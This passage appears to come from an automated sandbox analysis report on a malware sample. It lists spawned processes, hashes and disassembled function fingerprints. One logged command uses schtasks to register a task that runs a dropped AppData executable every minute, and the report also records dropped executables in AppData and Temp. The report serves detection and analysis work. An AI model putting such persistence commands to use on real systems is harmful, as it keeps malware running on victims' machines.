                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff790030000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:77
                                      Start time:17:51:29
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                      Imagebase:0x7ff7d3e90000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:78
                                      Start time:17:52:00
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x990000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:79
                                      Start time:17:52:02
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff646940000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:80
                                      Start time:17:52:02
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFE167F08AA Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: i_H$k=M_^
                                        • API String ID: 0-2342840862
                                        • Opcode ID: cf239a1ff0b41bd28da01b75412a3c52ed2734575890cbe27be6027bcce9566c
                                        • Instruction ID: bc6fd2545efd88ca040d4b6c5b80b6857e7b5c78e2b15c07847e2fc4c02f429f
                                        • Opcode Fuzzy Hash: cf239a1ff0b41bd28da01b75412a3c52ed2734575890cbe27be6027bcce9566c
                                        • Instruction Fuzzy Hash: DCF01271D19A0F9FDF55CB5594719FD77B1FF48310F5000F5C12EA2291DA282405C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F1F48 Relevance: 1.7, Strings: 1, Instructions: 473COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]pt
                                        • API String ID: 0-1447562928
                                        • Opcode ID: c2132e3d460f17f5dae773333f8ddcb328b575d3577f04f30f117d16904e94ac
                                        • Instruction ID: 1c8d9a2f6bdfdaebf5e919e4342843fad87465492272c7c71c53f119717f003e
                                        • Opcode Fuzzy Hash: c2132e3d460f17f5dae773333f8ddcb328b575d3577f04f30f117d16904e94ac
                                        • Instruction Fuzzy Hash: 44E1283191E9458BE768D659A876DF477D0EF46332F0441F9D07EC39B2EE28680E8B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F1B0F Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#pt
                                        • API String ID: 0-2469598167
                                        • Opcode ID: b5d61d0a7bd3e9e153ede0d26c7c6d1981252734cf944da7a3d758d0de963837
                                        • Instruction ID: d1ca8779e0bca749d31bae8f76c30d9fa58dfcaa955a1fcfd8677ef816dcb12f
                                        • Opcode Fuzzy Hash: b5d61d0a7bd3e9e153ede0d26c7c6d1981252734cf944da7a3d758d0de963837
                                        • Instruction Fuzzy Hash: B081F331A1C90D8FE768EA19D895BB973E5FF46322F1041FAD05FC32A1EE25AC468741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2DAB Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r6ft
                                        • API String ID: 0-2757449517
                                        • Opcode ID: d9a9e9799c226abf8a7fc843cd33d4c40b5516d98642b5180b748061e0c595b0
                                        • Instruction ID: b8ec05de7b3a32241dba23658b55e368106a7d0370372b203ca01ca29ef5c3fa
                                        • Opcode Fuzzy Hash: d9a9e9799c226abf8a7fc843cd33d4c40b5516d98642b5180b748061e0c595b0
                                        • Instruction Fuzzy Hash: 6AD09231714D088FDF85FB18C458EA673E2EBA87057644069D00AC72A5DE25ED86CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F0B25 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2690699e156556dc58f43793407552acf6d7bd5a46a9d1ca9261e1a65af066d
                                        • Instruction ID: c14337425faf03d01c5df2e2ef38dfd25d9eb6e38650342d089bcdf9ee92d081
                                        • Opcode Fuzzy Hash: a2690699e156556dc58f43793407552acf6d7bd5a46a9d1ca9261e1a65af066d
                                        • Instruction Fuzzy Hash: E341D731A0DD09CFDB59DA18C86AAE877E1FF44325F0006F9D06DC7671DE28A81AC780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F0B42 Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9909178b467660bbff9943a984fa517444b424693ca03ee0859e952845362381
                                        • Instruction ID: 5396d5a88d54a8bf62fc59aa2bd11134973defc62e8af8cafa01426ad2fdd36f
                                        • Opcode Fuzzy Hash: 9909178b467660bbff9943a984fa517444b424693ca03ee0859e952845362381
                                        • Instruction Fuzzy Hash: AE41B535A0ED098FDB69DA198866AF477D0EF84335F0006F9D06DC7672DA28A84AC791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2F24 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7eb83b326a4fdd5476b1697715345973e8a5b420286bc4443eccc4dd5b9d6346
                                        • Instruction ID: e4224f96ad09e58f65dac8e6bc6370cbe005e0fd83c9e6851f931c2feedbdc2e
                                        • Opcode Fuzzy Hash: 7eb83b326a4fdd5476b1697715345973e8a5b420286bc4443eccc4dd5b9d6346
                                        • Instruction Fuzzy Hash: B5414A3062EA464FD305DA2DC454DA17BE2EFE6311B1885FEE0C9C717BD928E886C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2AAC Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff5d39991ae4767bc18f4c280ff6872dff64250d825435023ca3a06eb62bec65
                                        • Instruction ID: a043a5fccc4fc37aca82e4b1ab25ec93e28772426ca0cfc1da6c715783323863
                                        • Opcode Fuzzy Hash: ff5d39991ae4767bc18f4c280ff6872dff64250d825435023ca3a06eb62bec65
                                        • Instruction Fuzzy Hash: 57217A30348C088FDF89FF58C0ADE6533E2EBB970175041A9D50ACB6A6DE25ED85CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F204A Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d2d89bbe0e4930d7002bda717a21ec5e290509b1e1479dd2a65356f17172918
                                        • Instruction ID: 9be43fcef740ce32295e18c23f7150b3ac5bda91473c8d47b506b0d23c12161b
                                        • Opcode Fuzzy Hash: 2d2d89bbe0e4930d7002bda717a21ec5e290509b1e1479dd2a65356f17172918
                                        • Instruction Fuzzy Hash: 5A111231A08A188FDB58DF1CD445AADB7F1FF59321F1042ABE04ED3662DB31AC468B45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F0C25 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 435d279a336d0467656da0fc4b7288c1d42926fa517a5da9cce9042f3202379f
                                        • Instruction ID: 84bfc85423e4f1600ab72275c9c24e88d004f19998151b22c9aeb98b3cc4a728
                                        • Opcode Fuzzy Hash: 435d279a336d0467656da0fc4b7288c1d42926fa517a5da9cce9042f3202379f
                                        • Instruction Fuzzy Hash: 9601927171D9088FDB98DA1C94666F977D1EF88321B0002FFE09EC7A72DE25A8198741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F28D1 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 322c06d92c39a7c9947ad64acd7323f9cdc93d83e2f44db4c5293f770dc79cb5
                                        • Instruction ID: 6b86a88967fbd354e10bfab9742cd1fb2ad3f722636bf8baa98bcaeeedcc411b
                                        • Opcode Fuzzy Hash: 322c06d92c39a7c9947ad64acd7323f9cdc93d83e2f44db4c5293f770dc79cb5
                                        • Instruction Fuzzy Hash: FD01A4312488188FDF85FF28D09CE6573E2FB783017554459D04ACB665DE32EC86CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2864 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9cf7d6126f52f47b2ba7f150a6ee6fe715e0bb3c11ce3a4238b511a43bd2aa5c
                                        • Instruction ID: 0b7049300c6d1750c9d224ce1f91fb23bdceeb6077934ff4af50e343500e3275
                                        • Opcode Fuzzy Hash: 9cf7d6126f52f47b2ba7f150a6ee6fe715e0bb3c11ce3a4238b511a43bd2aa5c
                                        • Instruction Fuzzy Hash: 57F0EC307488188F8F88FF28D0A8EA533E1EB79301355419AE40ACB2A5DE21ED85CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2871 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cf68a200c66d70a82396e65a3832b10f601d15131bd4cc44eb94aa7f4587559
                                        • Instruction ID: f69acf1d4e8e7b7dfd77670f5b911582c544f051afae83a072bbe33a6573f3b6
                                        • Opcode Fuzzy Hash: 4cf68a200c66d70a82396e65a3832b10f601d15131bd4cc44eb94aa7f4587559
                                        • Instruction Fuzzy Hash: AEF0A9316488188FDF89FF28C09DE6537E1EB797417154099E40ACB6A5DE31ED85CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F27F1 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60e78ea279785d1988a140585c36dac1601b436f91821d6e08e7983b88be1423
                                        • Instruction ID: 246fb3f080dcc1ee38bad3649f3bb8d99fece2b8bd9bb44951de2a1caa926870
                                        • Opcode Fuzzy Hash: 60e78ea279785d1988a140585c36dac1601b436f91821d6e08e7983b88be1423
                                        • Instruction Fuzzy Hash: D0F03031609C084FAA98D7598068EB437D1EB6871176180E6C12BC72B5ED25E846C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2946 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b1940a9c0bc12e8969a24d448c39357c33d468c689fdb1829bc81ff311aaa24
                                        • Instruction ID: da43eac74fd936c69b804693a1787cb0b806e4f4988f365b032bfd4f62ab49b7
                                        • Opcode Fuzzy Hash: 2b1940a9c0bc12e8969a24d448c39357c33d468c689fdb1829bc81ff311aaa24
                                        • Instruction Fuzzy Hash: 21F09231348D088FDB85FA68D09CE6573A2FB79301B554469D10AC76A5DE21E986CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F1618 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4428d141730f284a5e60629f584fd99c7fcd2b479806c082fdca129b3e709d6
                                        • Instruction ID: 6da41c5c5bc230fbea77f24812547f109a534ca7bed08d6ab0d8f827e5c46fb1
                                        • Opcode Fuzzy Hash: d4428d141730f284a5e60629f584fd99c7fcd2b479806c082fdca129b3e709d6
                                        • Instruction Fuzzy Hash: 73011D30D1891D8FDF94EB98C4A4BACB7B1FB68301F6440AAC00DE7295DE31A885CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2A54 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c46cba5057aa2ec8ac5aeb4ff9c652e770915af713e1dfbbb02d3bc1aaecef4
                                        • Instruction ID: 08c2065f4c1b40abddc7234077f32aa7b189635ebd708d436510c6ab9868be5d
                                        • Opcode Fuzzy Hash: 5c46cba5057aa2ec8ac5aeb4ff9c652e770915af713e1dfbbb02d3bc1aaecef4
                                        • Instruction Fuzzy Hash: 21F0FE303488088FDF84FF18D098E6533A1FB783007504059D50AC76A5DE31ED85CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F1917 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc825f1c70f5dc5acc8cfa74aa32036a5410909f0afd1bf089a95186b1253ece
                                        • Instruction ID: f7e85a1f35bc7c8a59078f2471476d1d823299e24bc8aabcafdfbf2bf6f9cbad
                                        • Opcode Fuzzy Hash: cc825f1c70f5dc5acc8cfa74aa32036a5410909f0afd1bf089a95186b1253ece
                                        • Instruction Fuzzy Hash: 93F0A531A5481C8FCF94EA18D894BA9B3B1FBA9301F14449AD00EE3251CA729DC1CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F10E1 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40dde85ff6b9a9efa4d802af799023bfb788bec931de938e3489bbe688eb154b
                                        • Instruction ID: a66a24ac7a5db38b3bc8a64aebb540805f8617d459db64a782cc661b02def99a
                                        • Opcode Fuzzy Hash: 40dde85ff6b9a9efa4d802af799023bfb788bec931de938e3489bbe688eb154b
                                        • Instruction Fuzzy Hash: FDD01215A6EC6B47E5A5511A30759FC52C08B4D671F5501F6C42DC72D1CC8C1CD646C1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F27FC Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85657cda84a8dc0e4c30e4bec32f4facf57cde83c3c7b146529c5956270940fe
                                        • Instruction ID: 47490079023076ad6e3699ca390316863a4eea4ef9c32e3a0322786755843062
                                        • Opcode Fuzzy Hash: 85657cda84a8dc0e4c30e4bec32f4facf57cde83c3c7b146529c5956270940fe
                                        • Instruction Fuzzy Hash: C8E0EC30749C0C4FAAC9FA2C806DEB933D2EBE871175500A6E00EC73B5DD24DC868741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F1110 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8ebd56f5500e1513a138b1f6a9c248b5d27fe0331226180e3734d662c7b9c28
                                        • Instruction ID: 9ec7bf32deed101918e3b1c07c6caea6356f6d2e9b0cb3852b2a82bbbf2349e1
                                        • Opcode Fuzzy Hash: c8ebd56f5500e1513a138b1f6a9c248b5d27fe0331226180e3734d662c7b9c28
                                        • Instruction Fuzzy Hash: 47E0C231558C094FCF98F669E088EE173E0EB28300701449AD41AC72A9DD25DCC1CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F37DE Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d522a8655b12f7e8f7615ec5faac5a88f38d823e4e4a22112020e91e83f8b8d4
                                        • Instruction ID: b72670ca9c0dadcfc3bcfe54038f7833b8ddd51377b7e1074fad2602850c396e
                                        • Opcode Fuzzy Hash: d522a8655b12f7e8f7615ec5faac5a88f38d823e4e4a22112020e91e83f8b8d4
                                        • Instruction Fuzzy Hash: 21D05E327588184FEB44F718E449BA5B3D1EB6432172544A6D00AC71A5ED27D882CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F2D8A Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc6729a99fd6cd7eedf7b0c5b269987bf5461464952bfed4e1bdbc57fc849197
                                        • Instruction ID: 7e0096707378986465e482cfecf42ce68b519349db9d06e0ac58596ba15b4e3e
                                        • Opcode Fuzzy Hash: dc6729a99fd6cd7eedf7b0c5b269987bf5461464952bfed4e1bdbc57fc849197
                                        • Instruction Fuzzy Hash: 81C04C05B29D0D1B5194EA6C385926D23C2D79C491785127B951EC335ADC55584B0282
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F10C3 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: bda60e5dbb4990e4d815f8040dc27c4bfff39d01b4420feba5e91a47ac173786
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: C8C08035EDF9174BF994509570228FC7250CF0A330F4420F9C02F86292DCCD18D54641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE167F198F Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction ID: 57a52c891f1f3722bedbc7d6677582d8f487022e7410c35ab4cd9692643745fd
                                        • Opcode Fuzzy Hash: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction Fuzzy Hash: 5FD05E34C2E68DD7DB10DB1194214EC7B20FF41310F2001EAE96D02190CE74675C9682
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FF7BB311140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2348766926.00007FF7BB311000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7BB310000, based on PE: true
                                        • Associated: 00000002.00000002.2348745932.00007FF7BB310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2348791740.00007FF7BB317000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2348811484.00007FF7BB319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2349002071.00007FF7BB58D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2349215637.00007FF7BB803000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2349239244.00007FF7BB805000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff7bb310000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: d7d209f9384f4ee5cf475677fb0d64aae1cf0debb5ac7d104b151fd91de2c1ae
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: 59B0926191470984E2007B0D9841298A268BBAA740F800034CA0C03366CABD50408B20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFE167D08AA Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: k_H$k=O_^
                                        • API String ID: 0-1679532271
